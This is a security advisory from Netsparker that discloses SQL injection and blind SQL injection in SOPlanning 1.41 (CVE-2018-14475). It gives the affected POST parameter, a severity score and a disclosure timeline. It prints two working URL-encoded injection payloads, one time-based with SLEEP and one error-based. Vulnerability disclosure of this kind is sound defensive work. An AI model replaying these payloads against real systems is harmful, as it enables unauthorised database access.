Advisory by Netsparker
Name: SQL Injection and Blind SQL Injection in SOPlanning
Affected Software: SOPlanning
Affected Versions: 1.41
Vulnerability: SQL Injection, Blind SQL Injection
Severity: High
Status: Fixed
CVE-ID:  - 2018-14475
CVSS Score (3.0):  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N (8.6)
Netsparker Advisory Reference: NS-18-023

Technical Details

Blind SQL Injection

URL  http://scanapps.ns/soplanning/www/projets.php
Parameter Name  statut%5b%5d
Parameter Type  POST
Attack Pattern  a_faire+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

SQL Injection

URL  http://scanapps.ns/soplanning/www/projets.php
Parameter Name  statut%5b%5d
Parameter Type  POST
Attack Pattern  -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

For more information on SQL Injection vulnerabilities read the article on SQL Injection.

Advisory Timeline

6th Febuary 2018- First Contact
20th August 2018 - Vendor Fixed
30th November 2018 - Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Enterprise. Visit our website for more information.